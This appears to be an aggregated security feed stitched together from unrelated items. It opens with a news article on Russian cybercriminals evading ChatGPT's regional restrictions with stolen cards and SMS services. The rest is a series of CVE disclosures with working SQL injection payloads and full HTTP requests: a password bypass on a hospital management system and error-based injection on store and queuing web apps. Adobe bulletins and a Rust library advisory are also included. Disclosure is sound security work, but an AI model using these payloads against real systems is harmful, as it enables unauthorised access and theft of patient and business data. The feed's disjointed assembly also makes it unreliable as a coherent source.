By Waqas
One of the threat actors inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.
This is a post from HackRead.com Read the original post: Russian Hackers Eager to Bypass OpenAI’s Restrictions to Abuse ChatGPT

Russian hacker forums have been flooded with queries wondering how hackers can bypass OpenAI’s restrictions to exploit ChatGPT for spreading malware and other day-to-day criminal operations.

Hackread.com earlier **reported** how hackers are abusing ChatGPT to deploy malware. As per the latest news, Russian hackers are now trying to bypass OpenAI restrictions to exploit ChatGPT for malicious purposes.

According to Check Point Research (CPR), Russian hackers are trying to bypass OpenAI‘s restrictions for the malicious use of ChatGPT. For your information, ChatGPT is an OpenAI-owned chatbot launched in November 2022.

An article published on a Russian hacker forum (Image shared with Hackread.com by Check Point)

It is designed on the GPT-3 family of large language models and has been fine-tuned with reinforcement and supervised learning techniques. Its core function is mimicking human conversations, but the chatbot is highly versatile and features voice improvisation skills. 

Such as it can debug or write computer programs for composing music, fairy tales, teleplays, and even essays. Moreover, it can answer test questions, write poetry and lyrics, and emulate a Linux system.

**Russian Hackers and ChatGPT**

Given its versatility, Russian hackers are looking to bypass OpenAI’s API restrictions to access this chatbot. Check Point researchers identified discussions on underground hacking forums where threat actors shared details on how to circumvent IPs, phone numbers, and payment card restrictions, which are essential for using this platform from Russia.

Threat Intelligence Group Manager at Check Point Software Technologies, Sergey Shykevich, said that it isn’t challenging to bypass OpenAI’s restrictions for specific countries as it is easier there to access ChatGPT.

“Right now, we are seeing Russian hackers already discussing and checking how to get past the geofencing to use ChatGPT for their malicious purposes. We believe these hackers are most likely trying to implement and test ChatGPT into their day-to-day criminal operations.”

CPR has shared screenshots of these discussions. In one of the threads, a threat actor inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.

(Image shared with Hackread.com by Check Point)

In another thread, a cybercriminal is asking about bypassing the platform’s Geo Controls. In the third screenshot.

The third screenshot shows a tutorial shared on the hacking forums in Russian semi-legal online SMS services and how to use them to register ChatGPT.

(Image shared with Hackread.com by Check Point)

“Cybercriminals are growing more and more interested in ChatGPT because the AI technology behind it can make a hacker more cost-efficient,” Shykevich added.

**What if cyber criminals use AI?**

Artificial Intelligence **(AI) has been a boon to cybersecurity companies** and countless businesses, allowing them to automate processes and optimize their performance. But what if this powerful technology was used for nefarious purposes? Recent reports suggest that advances in AI are making it easier for cybercriminals to launch attacks on networks and steal valuable data.

Cybercriminals have long relied on automation tools to hide their activities from detection, but with the help of AI, they can take these tactics one step further. For example, attackers can use deep learning algorithms and natural language processing techniques to create more convincing phishing emails that can be used as part of larger schemes.

In addition, AI-based malware is becoming increasingly sophisticated, enabling it to evade traditional security measures like **anti-virus software** and **firewalls**.

1.  AI-based Model to Predict Extreme Wildfire Danger
2.  Website uses AI to create utterly realistic human faces
3.  Microsoft patent reveals chatbot to talk to dead people
4.  This AI Can Generate Unique and Free Bored Ape NFTs
5.  AI-Powered Smart Glasses Give Deafs Power of Speech
6.  ‘Fawkes’ privacy tool blocks images from facial recognition
7.  Retired Software Exploited To Target Power Grids, Microsoft
8.  Spyware Vendor Exploited Chrome, Firefox, Windows 0-days

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Russian Hackers Eager to Bypass OpenAI’s Restrictions to Abuse ChatGPT

Hospital Management System v1.0 is vulnerable to SQL Injection. Attackers can gain administrator privileges without the need for a password.

**CVE Disclosures**

Author: Frank Zeng

**The CVE ID for the entry： **CVE-2022-46093****

**A prose description:** SQL injection vulnerability in Hospital Management System via **a crafted POST request** to /Hospital-Management-System-master/func3.php.

**Root Cause and Impact:** Although the user name is restricted on the front page of the administrator login, the password is not effectively restricted and validated, allowing the attacker to use the vulnerable code for sql injection attacks. The sql statement executed on the server is as follows: select \* from admintb where username='admin@admin.com' and password='1' or username='admin';

Then,attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

**The name of an affected Product:** Hospital Management System

**The affected or fixed version:** v1.0

**Vendors:** https://github.com/kishan0725/Hospital-Management-System

**Vulnerability Type:** SQL Injection of Post Type

**Payload:** username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**HTTP Request:**

POST /Hospital-Management-System-master/func3.php HTTP/1.1
Host: localhost
Content-Length: 77
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/Hospital-Management-System-master/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=99cunoplmskd7cjgrmp5l9unbt
Connection: close

username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**Vulnerability url:** /Hospital-Management-System-master/index.php

**Vulnerability location:** /Hospital-Management-System-master/fun3.php

**Proof：**

**Supplementary information：**

**The attack process of manually entering the payload in the login box:**

The sql statement executed on the server is as follows: select \* from admintb where username='admin' and password='1' or username='admin';

Enter in the User Name column of the login box: **admin@admin.com** Enter in the Password column of the login box: **1' or username='admin**

**Request package**：Bypass checking the password

At this time, the password authentication is bypassed and the administrator account is successfully logged in.

Attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

CVE-2022-46093: z-vulnerabilitys/Hospital-Management-System.md at main · Frank-Z7/z-vulnerabilitys

An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL.

**CVE-2022-45299**

#Affected Library :

webbrowser.rs before version 0.8.3 https://github.com/amodm/webbrowser-rs

#Summary:

The library fails to validate that the provided input is actually an URL. An attacker in control of an unfiltered URL passed to webbrowser::open(URL) can, therefore, provide a local file path that will be opened in the default explorer or pass one argument to the underlying open command to execute arbitrary registered system commands.

#Details:

webbrowser::open internally calls shellExecuteW passing in the URL as an arg to open for Windows.On windows, the attacker controls the lpFile argument to shellExecuteW which may allow opening arbitrary local files. If an attacker manages to pass in an URL that is actually a command line switch to open, they may be able to launch arbitrary commands (or do whatever open allows them to do with one argument). For example, webbrowser::open(".") will open Finder in the current working dir. Also you can execute python scripts by just providing the path to the scriptand I managed to do that with any other language compiled or scripting. I couldn't reproduce the issue on linux but local files like /etc/passwd can be loaded by just providing the path to the file.

#vuln code: 

#POC:

CVE-2022-45299: GitHub - offalltn/CVE-2022-45299: CVE 2022-45299

Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InCopy | APSB23-08

**Bulletin ID**

**Date Published**

**Priority**

APSB23-08

January 10, 2023

3

**Summary**

Adobe has released a security update for Adobe InCopy.  This update addresses multiple  critical and an important vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.                    

**Affected versions**

ID18.0 and earlier version.  

ID17.4 and earlier version.        

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InCopy Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InCopy   

Release: ID18.1  

Windows  and macOS    

3

Adobe InCopy   

Release: ID17.4.1  

Windows  and macOS    

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21594  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21595  

Improper Input Validation (CWE-20)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21596  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21597  

Use After Free (CWE-416)  

Memory leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21598  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21599  

**Acknowledgments**

Adobe would like to thank the following researchers for reporting this issue and for working with Adobe to help protect our customers.  

*   Mat Powell with Trend Micro Zero Day Initiative -- CVE-2023-21594, CVE-2023-21595, CVE-2023-21596, CVE-2023-21597, CVE-2023-21598, CVE-2023-21599  
    

**Revisions**

July 13, 2022: Bulletin revised for inclusion of CVE-2022-34249, CVE-2022-34250, CVE-2022-34251 and CVE-2022-34252  
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2023-21599: Adobe Security Bulletin

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_brand.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_brand

Vulnerability location: /hss/classes/Master.php?f=delete\_brand,id

dbname =hss\_db,length=6

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_brand HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=brands
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46946: bug_report/SQLi-2.md at main · Venus-XATBLab-YT/bug_report

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_category

Vulnerability location: /hss/classes/Master.php?f=delete\_category,id

dbname =hss\_db,length=6

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=categories
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46947: bug_report/SQLi-1.md at main · Venus-XATBLab-YT/bug_report

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_helmet.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_helmet

Vulnerability location: /hss/classes/Master.php?f=delete\_helmet,id

dbname =hss\_db,length=6

\[+\] Payload: id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_helmet HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46949: bug_report/SQLi-3.md at main · Venus-XATBLab-YT/bug_report

Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InDesign | APSB23-07

**Bulletin ID**

**Date Published**

**Priority**

APSB23-07  

January 10, 2023   

3

**Summary**

Adobe has released a security update for Adobe InDesign.  This update addresses multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution, application denial-of-service and memory leak.  

**Affected versions**

ID18.0 and earlier version.

ID17.4 and earlier version.                                           

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InDesign Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InDesign

Release: ID18.1

Windows and macOS

3

Adobe InDesign

Release: ID17.4.1  

Windows and macOS

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21587  

Improper Input Validation (CWE-20)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21588  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21589

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-21590  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21591  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-21592  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

*   Mat Powell with Trend Micro Zero Day Initiative - CVE-2023-21587; CVE-2023-21588; CVE-2023-21589; CVE-2023-21590; CVE-2023-21591; CVE-2023-21592

**Revisions:**

*   **July 13, 2022:** Bulletin APSB22-30 revised to include (CVE-2022-34245, CVE-2022-34246, CVE-2022-34247, CVE-2022-34248)
*   **July 16, 2022:** Changed CVE-2022-28851 to 3rd party open-source library vulnerability PhantomJS CVE-2019-17221

CVE-2023-21592: Adobe Security Bulletin

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_uploads

Vulnerability location: /queuing/admin/ajax.php?action=delete\_uploads, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_uploads HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46951: bug_report/SQLi-2.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_window.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_window

Vulnerability location: /queuing/admin/ajax.php?action=delete\_window, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_window HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

Tag

#windows